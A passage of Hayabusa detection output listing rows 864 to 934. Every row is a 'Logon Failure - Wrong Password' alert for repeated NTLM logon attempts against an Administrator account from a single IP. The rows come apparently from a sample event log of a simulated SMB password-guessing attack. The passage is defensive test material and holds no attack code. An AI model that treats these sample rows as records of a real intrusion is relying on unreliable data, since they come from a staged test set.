| 864 | 2016-09-20 01:50:15.644 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 865 | 2016-09-20 01:50:15.685 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 866 | 2016-09-20 01:50:15.733 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 867 | 2016-09-20 01:50:15.772 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 868 | 2016-09-20 01:50:15.807 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 869 | 2016-09-20 01:50:15.852 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 870 | 2016-09-20 01:50:15.885 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 871 | 2016-09-20 01:50:15.924 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 872 | 2016-09-20 01:50:15.966 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 873 | 2016-09-20 01:50:16.012 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 874 | 2016-09-20 01:50:16.059 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 875 | 2016-09-20 01:50:16.092 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 876 | 2016-09-20 01:50:16.133 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 877 | 2016-09-20 01:50:16.166 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 878 | 2016-09-20 01:50:16.209 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 879 | 2016-09-20 01:50:16.252 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 880 | 2016-09-20 01:50:16.289 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 881 | 2016-09-20 01:50:16.328 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 882 | 2016-09-20 01:50:16.427 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 883 | 2016-09-20 01:50:16.459 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 884 | 2016-09-20 01:50:16.507 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 885 | 2016-09-20 01:50:16.549 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 886 | 2016-09-20 01:50:16.596 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 887 | 2016-09-20 01:50:16.623 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 888 | 2016-09-20 01:50:16.664 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 889 | 2016-09-20 01:50:16.701 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 890 | 2016-09-20 01:50:16.741 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 891 | 2016-09-20 01:50:16.783 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 892 | 2016-09-20 01:50:16.827 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 893 | 2016-09-20 01:50:16.872 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 894 | 2016-09-20 01:50:16.904 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 895 | 2016-09-20 01:50:16.947 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 896 | 2016-09-20 01:50:16.982 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 897 | 2016-09-20 01:50:17.023 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 898 | 2016-09-20 01:50:17.051 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 899 | 2016-09-20 01:50:17.099 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 900 | 2016-09-20 01:50:17.148 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 901 | 2016-09-20 01:50:17.192 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 902 | 2016-09-20 01:50:17.237 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 903 | 2016-09-20 01:50:17.277 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 904 | 2016-09-20 01:50:17.312 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 905 | 2016-09-20 01:50:17.357 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 906 | 2016-09-20 01:50:17.414 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 907 | 2016-09-20 01:50:17.453 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 908 | 2016-09-20 01:50:17.486 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 909 | 2016-09-20 01:50:17.524 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 910 | 2016-09-20 01:50:17.563 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 911 | 2016-09-20 01:50:17.605 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 912 | 2016-09-20 01:50:17.648 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 913 | 2016-09-20 01:50:17.692 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 914 | 2016-09-20 01:50:17.728 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 915 | 2016-09-20 01:50:17.866 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 916 | 2016-09-20 01:50:17.921 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 917 | 2016-09-20 01:50:17.965 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 918 | 2016-09-20 01:50:18.009 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 919 | 2016-09-20 01:50:18.051 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 920 | 2016-09-20 01:50:18.093 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 921 | 2016-09-20 01:50:18.128 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 922 | 2016-09-20 01:50:18.175 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 923 | 2016-09-20 01:50:18.213 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 924 | 2016-09-20 01:50:18.260 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 925 | 2016-09-20 01:50:18.292 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 926 | 2016-09-20 01:50:18.337 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 927 | 2016-09-20 01:50:18.372 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 928 | 2016-09-20 01:50:18.420 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 929 | 2016-09-20 01:50:18.462 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 930 | 2016-09-20 01:50:18.504 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 931 | 2016-09-20 01:50:18.597 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 932 | 2016-09-20 01:50:18.630 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 933 | 2016-09-20 01:50:18.666 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 934 | 2016-09-20 01:50:18.712 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
